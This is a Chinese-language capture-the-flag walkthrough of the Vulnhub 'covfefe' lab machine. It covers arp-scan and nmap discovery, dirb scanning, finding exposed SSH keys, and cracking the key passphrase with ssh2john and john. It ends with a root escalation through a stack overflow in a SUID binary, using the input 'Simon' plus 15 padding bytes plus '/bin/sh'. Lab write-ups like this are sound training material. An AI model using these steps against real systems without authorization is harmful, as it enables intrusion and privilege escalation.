分类:Web渗透 2026 年 5 月 26 日

Vulnhub靶场之covfefe

covfefe;vulnhub;堆栈溢出
Vulnhub靶场之covfefe相关内容

下载地址

image-20260526144242847

操作环境

攻击机:kali2026.1

image-20260512155905342

虚拟网卡

VMnet19:192.168.19.0/24

靶机渗透

主机探测

arp-scan -l

image-20260526145145568

靶机ip为192.168.19.137

端口探测

nmap -p- 192.168.19.137

image-20260526145340211

开放了80端口,在浏览器中访问一下

端口访问

image-20260526145428003

80端口没有发现什么异常,访问31337端口

image-20260526145630978

目录扫描

dirb http://192.168.19.137
dirb http://192.168.19.137:31337/ -N 404

image-20260526150647897

image-20260526151014951

访问robots.txt,然后根据提示可找到flag1

image-20260526151408236

image-20260526151431605

可以猜测出,31337是ssh端口

image-20260526151118940

分别下载这些文件

image-20260526151622309

分别查看三个文件

image-20260526151921120

得到用户名为simon

漏洞利用

使用john爆破加密私钥,首先使用ssh2john.py将加密的文件换成john可破解的hash格式

ssh2john id_rsa > 1

破解加密文件

john 1

image-20260526152710934

使用ssh远程登录

ssh -i id_rsa simon@192.168.19.137

image-20260526152825623

提权

查找特殊suid

find / -perm -4000 2>/dev/null

image-20260526153442909

尝试使用/usr/local/bin/read_message提权,查找一下有无源码

find / -name "read_message*" 2>/dev/null

image-20260526153931340

查看一下/root

image-20260526154053807

发现flag,但是权限不够,查看源码,发现flag2

image-20260526154141540

源码逻辑:当我们输入一个字符串时, 它将与Simon 一起检查字符串的前5字符。如果匹配, 它将运行一个程序/usr/local/bin/read_message。现在输入它被分配大小为20个字节。因此, 我们溢出堆栈进入超过20个字节的数据。我们使用前5个字符是 "Simon", 然后是 15 个任意字符, 然后是 "/bin/sh" 在第21字节,溢出提权。

运行read_message在输入用户名后随意加15字节(5+15=20)的内容,再加/bin/sh调用sh命 令解释器 ,获取root权限。

image-20260526154527463

提权-堆栈溢出

查看/root/flag.txt

cat /root/flag.txt

image-20260526154623652

文章评论